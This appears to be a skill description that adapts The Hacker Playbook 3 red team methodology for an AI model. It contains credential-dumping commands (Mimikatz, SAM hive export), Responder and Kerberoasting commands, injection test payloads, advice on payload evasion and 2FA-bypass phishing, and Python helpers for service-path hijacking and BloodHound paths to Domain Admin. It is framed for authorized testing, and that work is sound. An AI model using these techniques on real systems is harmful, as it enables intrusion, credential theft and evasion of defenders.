The Hacker Playbook 3
Red team operations playbook — from recon through web exploitation, AD attack paths, lateral movement, and social engineering. Includes lab exercises and real-world attack chains against simulated environments.
- Conduct red team recon: subdomain enum, GitHub scanning, cloud asset discovery, cert transparency
- Execute server-side web attacks: SSRF, XXE, SSTI, deserialization, NoSQLi
- Use Responder + MultiRelay for LLMNR poisoning and NTLM relay attacks
- Dump credentials from LSASS, SAM hive, and browsers after initial access
- Run BloodHound for AD attack path analysis to Domain Admin
- Execute lateral movement: Pass-the-Hash, WMI, DCOM, Pass-the-Ticket
- Perform Kerberoasting to crack service account TGS tickets offline
- Build phishing infrastructure with doppelganger domains and 2FA bypass proxies
- Apply post-exploitation checklist: persist → escalate → dump creds → map → C2 → objective
Install this skill and Claude can walk through a full red team engagement lifecycle from passive recon through Active Directory compromise — reasoning through BloodHound attack paths, NTLM relay opportunities, phishing infrastructure design, Kerberoasting targets, and prioritized post-exploitation checklists tailored to specific engagement scopes
Red team engagements fail to deliver value when they lack a structured methodology that connects initial access to business-risk objectives — this playbook's phase-ordered approach ensures operators systematically work through persistence, escalation, and lateral movement rather than getting stuck at perimeter access
- Analyzing a BloodHound export showing service accounts with SPNs to identify Kerberoasting targets and map the shortest escalation path to Domain Admin
- Designing a doppelganger domain phishing campaign with a 2FA-bypass reverse proxy for a red team engagement against an organization using Okta SSO
- Identifying which hosts in a subnet do not require SMB signing and outlining a MultiRelay NTLM relay attack chain to achieve lateral movement without cracking credentials
The Hacker Playbook 3 Skill
Red Team vs Penetration Test
| Pentest | Red Team |
|---|---|
| Enumerate and exploit all vulnerabilities | Simulate a specific adversary |
| Report all findings | Achieve specific objective (data exfil, persistence) |
| Time-boxed scope | May run weeks/months undetected |
| Detection is acceptable | Evasion is primary goal |
Phase 1: Recon
Passive Recon
- Nmap diffing: run scans on a schedule (weekly), diff the results to detect newly exposed services
- Subdomain enumeration: `subfinder`, `amass`, brute-force DNS
- GitHub scanning: employees may commit credentials, API keys, internal URLs
- SSL cert parsing: `crt.sh` shows all certs issued for a domain → subdomain discovery
- Cloud asset discovery: `cloud_enum`, `s3scanner` for misconfigured buckets
- Shodan/Censys: find exposed services, ICS devices, cameras
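The cert-transparency step above, as an added example (not code from the book or the skill): parse the JSON that `crt.sh` returns for a `%.domain` query into a clean hostname list, and diff two runs so the weekly-cadence idea from the Nmap bullet applies to certificates too. The records in `SAMPLE_CRTSH_JSON` are constructed; only the field names (`name_value`, `common_name`, `issuer_name`) follow the real crt.sh output.

```python
import json

# Constructed sample in the shape of https://crt.sh/?q=%25.example.com&output=json
# (crt.sh returns a JSON list; name_value carries newline-separated SAN entries).
# The records and hostnames here are made up for the example.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "www.example.com",
     "name_value": "example.com\nwww.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "*.example.com", "name_value": "*.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "vpn.example.com",
     "name_value": "vpn.example.com\nVPN.EXAMPLE.COM"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "dev-jenkins.corp.example.com",
     "name_value": "dev-jenkins.corp.example.com"},
    # suffix look-alike that is NOT under example.com and must be filtered out
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "example.com.evil.test",
     "name_value": "example.com.evil.test"},
])


def subdomains_from_crtsh(raw_json: str, domain: str) -> list:
    """Return sorted, de-duplicated hostnames under `domain` from crt.sh JSON output.

    Splits multi-SAN name_value fields, lowercases, drops wildcard labels
    (a cert for *.example.com tells you nothing beyond the base name), and keeps
    only names that are the domain itself or end with ".<domain>", so that
    suffix look-alikes such as example.com.evil.test are excluded.
    """
    domain = domain.lower().strip(".")
    found = set()
    for record in json.loads(raw_json):
        for name in record.get("name_value", "").split("\n"):
            name = name.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]
            if name == domain or name.endswith("." + domain):
                found.add(name)
    return sorted(found)


def new_hostnames(previous: list, current: list) -> list:
    """Diff two runs (last week vs. today): names that appeared since the last run are
    the ones to look at first, because a new cert usually means a new deployment."""
    return sorted(set(current) - set(previous))


if __name__ == "__main__":
    import sys
    import urllib.request
    # Live use: python3 crtsh_subs.py example.com   (no API key needed)
    # Without an argument the constructed sample is parsed instead.
    target = sys.argv[1] if len(sys.argv) > 1 else "example.com"
    if len(sys.argv) > 1:
        url = f"https://crt.sh/?q=%25.{target}&output=json"
        with urllib.request.urlopen(url, timeout=30) as resp:
            raw = resp.read().decode()
    else:
        raw = SAMPLE_CRTSH_JSON
    for host in subdomains_from_crtsh(raw, target):
        print(host)
```

Feed the output to DNS resolution and the Nmap diff; the suffix filter matters because crt.sh matches on substring and will happily return certs for unrelated domains that merely contain yours.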
Email Harvesting
- `theHarvester`, LinkedIn, Hunter.io
- Build email format from patterns: `first.last@company.com`
Phase 2: Web Application Attacks
XSS Attack Chains
- Blind XSS: inject into fields processed by admins; payload calls back to attacker’s server
- DOM-based XSS: payload in URL fragment processed by client-side JavaScript
- XSS to compromise: steal admin session cookie → full account takeover
Dangerous Server-Side Attacks
| Attack | Root Cause | Test |
|---|---|---|
| SSRF | User-supplied URL fetched by server | http://169.254.169.254/latest/meta-data/ |
| XXE | External entities in XML input | <!ENTITY xxe SYSTEM "file:///etc/passwd"> |
| SSTI | Template expression in user input | {{7*7}} → if 49 returned, exploitable |
| Deserialization | Untrusted serialized objects | Language-specific gadget chains |
| NoSQLi | MongoDB operators in JSON input | {"$gt": ""} bypasses authentication |
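The NoSQLi row, as an added example that is not from the book or the skill: a minimal stand-in for a MongoDB collection whose query matcher treats a scalar as equality and a dict as operators, a login that forwards the client's JSON straight into the query (so `{"$gt": ""}` matches any non-empty password), and the hardened version beside it. The user store, the matcher and the endpoint functions are all constructed for the demonstration; the operator semantics follow MongoDB's.

```python
import json
import re

# Constructed user store standing in for a MongoDB `users` collection.
# Passwords are plaintext here only so the operator-injection mechanics stay visible.
USERS = [
    {"username": "admin", "password": "S3cret-Admin!", "role": "admin"},
    {"username": "alice", "password": "hunter2", "role": "user"},
]


def _matches(value, condition) -> bool:
    """Minimal imitation of MongoDB query semantics.

    A scalar condition is an equality test; a dict is a set of operators. That dual
    interpretation is the root cause: if the application forwards a client-supplied
    JSON object where it expected a string, the client gets to pick the operator.
    """
    if not isinstance(condition, dict):
        return value == condition
    for op, arg in condition.items():
        if op == "$eq" and not value == arg:
            return False
        if op == "$ne" and not value != arg:
            return False
        if op == "$gt" and not (value is not None and value > arg):
            return False
        if op == "$regex" and not (isinstance(value, str) and re.search(arg, value)):
            return False
    return True


def find_one(collection, query):
    for doc in collection:
        if all(_matches(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def login_vulnerable(body: str):
    """The bug: decoded JSON values go straight into the query, so
    {"username": "admin", "password": {"$gt": ""}} matches admin's real password."""
    data = json.loads(body)
    return find_one(USERS, {"username": data["username"], "password": data["password"]})


def login_fixed(body: str):
    """Type-check the inputs and pin the comparison to $eq. Either measure alone blocks
    the injection; together they also survive a refactor that drops one of them."""
    data = json.loads(body)
    username, password = data.get("username"), data.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    return find_one(USERS, {"username": {"$eq": username}, "password": {"$eq": password}})
```

When testing a real target, send the JSON body with `Content-Type: application/json`; form-encoded `password[$gt]=` works against frameworks (Express with `qs`, PHP) that turn bracketed keys into nested objects.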
Phase 3: Network Exploitation
With No Credentials
- Responder: LLMNR/NBT-NS poisoning → capture NTLMv2 hashes: `responder -I eth0 -wrf` (`-w` rogue WPAD proxy, `-r` answer NetBIOS wredir queries, `-f` fingerprint hosts)
- MultiRelay: NTLM relay attacks for RCE on hosts where SMB signing is not required (signing "enabled" but not "required", the default for workstations and member servers, is still relayable; domain controllers require it by default)
- CrackMapExec: enumerate users, shares, password policies without credentials
After Initial Access
Credential Collection
```powershell
# Mimikatz in memory via PowerShell (needs local admin / SeDebugPrivilege to read LSASS)
Invoke-Mimikatz -DumpCreds
# From registry (offline): save the hives, then extract the hashes on the attack box
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
# Browser creds
Invoke-BrowserPasswordDump
```
Active Directory Reconnaissance
```powershell
# BloodHound: graph-based AD attack path finding (collector runs on a domain-joined host)
SharpHound.exe -c All
# Import the resulting zip into BloodHound → find shortest path to Domain Admin
```

```bash
# Service Principal Names (Kerberoasting), from the attack box with impacket
GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
# Crack the service account TGS tickets offline (hashcat -m 13100 for RC4 tickets)
```
Lateral Movement Techniques
| Technique | When to Use |
|---|---|
| Pass-the-Hash | Have an NTLM hash but no password; authenticate directly over SMB/WMI/WinRM without cracking (SMB signing does not block it, only NTLM relay) |
| Pass-the-Ticket | Have a valid Kerberos TGT/TGS; works where NTLM is disabled |
| WMI | Remote execution with no service creation, so fewer artifacts than PsExec |
| DCOM | Uses COM objects (MMC20.Application, ShellWindows); evades some detections |
| RDP | Slow, but very stable; requires credentials and a live session (no hash-only unless Restricted Admin mode is on) |
Privilege Escalation (Windows)
- Unquoted service paths
- Weak service permissions (replace binary)
- AlwaysInstallElevated (MSI privilege abuse)
- Token impersonation (SeImpersonatePrivilege → Potato attacks)
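The first two privilege escalation checks above, as an added example (not code from the book): given the `ImagePath` values of the services on a host, enumerate the executables the Service Control Manager will try before the real binary when the path is unquoted and contains spaces, then cross them against directories the current user can write to. The service names, paths and the writable-directory set are constructed; on a target, the paths come from `sc qc` or the `HKLM\SYSTEM\CurrentControlSet\Services` keys and the writable set from `icacls`.

```python
import ntpath
import re

# Constructed ImagePath values as `sc qc <name>` would show them (names and paths made up).
SAMPLE_SERVICES = {
    "AcmeBackup": r"C:\Program Files\Acme Backup\agent\backupsvc.exe -service",
    "AcmeUpdater": r'"C:\Program Files\Acme Backup\updater.exe" /quiet',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "LegacyMon": r"C:\Acme Tools\monitor\legacy monitor.exe",
}

# Constructed: directories the low-privileged user can write to (a misconfigured ACL
# on the LegacyMon install directory). Build this from icacls output on a real host.
SAMPLE_WRITABLE_DIRS = {r"C:\Acme Tools\monitor", r"C:\Users\Public"}


def hijack_candidates(image_path: str) -> list:
    r"""Executables the Service Control Manager will try, in order, before the real one.

    CreateProcess resolves an unquoted path with spaces by testing each prefix that
    ends at a space as "<prefix>.exe", so for
        C:\Program Files\Acme Backup\agent\backupsvc.exe
    it tries C:\Program.exe, then C:\Program Files\Acme.exe, then the real binary.
    A quoted path, or one without spaces, offers nothing.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    match = re.match(r"(?i)(.*?\.exe)", path)   # the binary ends at the first .exe; args follow
    if not match:
        return []
    words = match.group(1).split(" ")
    return [" ".join(words[:i]) + ".exe" for i in range(1, len(words))]


def plantable(services: dict, writable_dirs) -> dict:
    """Cross the candidates against writable directories: service name -> paths worth planting."""
    writable = {ntpath.normcase(d.rstrip("\\")) for d in writable_dirs}
    result = {}
    for name, image_path in services.items():
        hits = [c for c in hijack_candidates(image_path)
                if ntpath.normcase(ntpath.dirname(c).rstrip("\\")) in writable]
        if hits:
            result[name] = hits
    return result


if __name__ == "__main__":
    for svc, path in SAMPLE_SERVICES.items():
        print(f"{svc}: {hijack_candidates(path) or 'no candidates'}")
    print("plantable:", plantable(SAMPLE_SERVICES, SAMPLE_WRITABLE_DIRS))
```

A candidate is only useful if the service runs as SYSTEM (or another account worth having) and you can restart it or wait for a reboot; check `sc qc` for `SERVICE_START_NAME` and `sc sdshow` for start/stop rights before dropping a binary.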
Phase 4: Social Engineering
Phishing Infrastructure
- Doppelganger domains: register look-alikes such as `company-security.com`, `companyit.com`
- Clone authentication portals: capture credentials + relay to real site
- Bypass 2FA: reverse proxy that forwards MFA prompts in real time (EvilProxy, Modlishka)
Malicious Office Files
- Macro: VBA executes on open/close; common payload delivery
- DDE: Dynamic Data Exchange; executes commands without macros
- Hidden encrypted payloads: self-extracting archives embedded in documents
Payload Evasion
- Encode payloads in Base64, then multiple rounds
- Use `Invoke-Obfuscation` for PowerShell obfuscation
- Sign executables with purchased code signing certs
- Use LOLBins (mshta, regsvr32, wmic) to execute payloads
Phase 5: Physical Attacks
Hardware Tools
| Tool | Use Case |
|---|---|
| Bash Bunny | USB HID attack; auto-runs scripts on plug-in |
| Packet Squirrel | Inline network tap; MITM |
| LAN Turtle | Covert remote access over ethernet |
| Flipper Zero | NFC/RFID cloning, sub-GHz |
| WiFi Pineapple | Rogue AP, evil twin attacks |
Access Control Bypass
- RFID card cloning: Proxmark3 reads and emulates proximity cards
- Tailgating: follow badge-holder through door
- Social pretext: “I’m here to fix the copier / check the wiring”
Post-Exploitation Checklist
After initial access, in priority order:
- Establish persistence (scheduled task, registry run key, startup folder)
- Escalate privileges (local admin → domain admin path)
- Dump credentials (SAM hive, LSASS, browser passwords)
- Map the network (Bloodhound, Nmap from inside, CME spray)
- Establish C2 channel (DNS, HTTPS, legitimate cloud services)
- Move laterally to high-value targets (DC, file server, finance)
- Achieve objective (exfil data, demonstrate ransomware capability)
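The "escalate" and "map the network" steps of this checklist are where BloodHound output gets turned into a target list. The following is an added example, not code from the book, the skill or BloodHound itself: it reads a SharpHound-style `users.json`, lists the enabled SPN-bearing accounts (the Kerberoast targets, admincount first), and runs a breadth-first search over the graph edges to the Domain Admins group. The user records and the edge list are constructed; the `Properties` keys (`name`, `enabled`, `hasspn`, `serviceprincipalnames`, `admincount`) and the edge names (`MemberOf`, `AdminTo`, `HasSession`) are the ones BloodHound uses.

```python
import json
from collections import deque

# Constructed data in the shape of a SharpHound users.json export (accounts made up).
SAMPLE_USERS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1105", "Properties": {
        "name": "SVC_SQL@CORP.LOCAL", "enabled": True, "hasspn": True, "admincount": False,
        "serviceprincipalnames": ["MSSQLSvc/sql01.corp.local:1433"]}},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1106", "Properties": {
        "name": "SVC_BACKUP@CORP.LOCAL", "enabled": True, "hasspn": True, "admincount": True,
        "serviceprincipalnames": ["backup/bk01.corp.local"]}},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1107", "Properties": {
        "name": "SVC_OLD@CORP.LOCAL", "enabled": False, "hasspn": True, "admincount": False,
        "serviceprincipalnames": ["HTTP/old.corp.local"]}},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1108", "Properties": {
        "name": "JDOE@CORP.LOCAL", "enabled": True, "hasspn": False, "admincount": True,
        "serviceprincipalnames": []}},
], "meta": {"type": "users", "count": 4, "version": 5}})

# Constructed edges (source, relationship, target) as BloodHound would draw them.
SAMPLE_EDGES = [
    ("SVC_SQL@CORP.LOCAL", "MemberOf", "SQL ADMINS@CORP.LOCAL"),
    ("SQL ADMINS@CORP.LOCAL", "AdminTo", "SQL01.CORP.LOCAL"),
    ("SQL01.CORP.LOCAL", "HasSession", "JDOE@CORP.LOCAL"),
    ("JDOE@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("SVC_BACKUP@CORP.LOCAL", "MemberOf", "BACKUP OPERATORS@CORP.LOCAL"),
    ("BACKUP OPERATORS@CORP.LOCAL", "AdminTo", "BK01.CORP.LOCAL"),
]


def kerberoast_targets(users_json: str) -> list:
    """Enabled accounts with an SPN; admincount'ed ones first (highest payoff if cracked).
    Disabled accounts are skipped: the KDC will not issue tickets for them."""
    users = json.loads(users_json)["data"]
    hits = [u["Properties"] for u in users
            if u["Properties"].get("hasspn") and u["Properties"].get("enabled")]
    hits.sort(key=lambda p: (not p.get("admincount", False), p["name"]))
    return [(p["name"], p["serviceprincipalnames"]) for p in hits]


def shortest_path(edges, start: str, goal: str):
    """Breadth-first search over directed edges; returns [(node, rel, node), ...] or None."""
    adjacency = {}
    for src, rel, dst in edges:
        adjacency.setdefault(src, []).append((rel, dst))
    queue = deque([start])
    parent = {start: None}
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while parent[node] is not None:
                prev, rel = parent[node]
                path.append((prev, rel, node))
                node = prev
            return path[::-1]
        for rel, nxt in adjacency.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    return None


def paths_to_domain_admin(users_json: str, edges, domain: str = "CORP.LOCAL") -> dict:
    """Map each Kerberoast target to its shortest path to Domain Admins (None if no path)."""
    goal = f"DOMAIN ADMINS@{domain}"
    return {name: shortest_path(edges, name, goal) for name, _ in kerberoast_targets(users_json)}


if __name__ == "__main__":
    for name, path in paths_to_domain_admin(SAMPLE_USERS_JSON, SAMPLE_EDGES).items():
        steps = " -> ".join(f"{s} [{r}] {t}" for s, r, t in path) if path else "no path"
        print(f"{name}: {steps}")
```

Prioritise accounts with a short path first: cracking `SVC_SQL` here yields local admin on `SQL01`, where a Domain Admin has a session whose credentials the LSASS dump in "Credential Collection" would recover. `SVC_BACKUP` is admincount'ed but has no path to the goal in this graph, which is exactly the kind of distinction a flat SPN list hides.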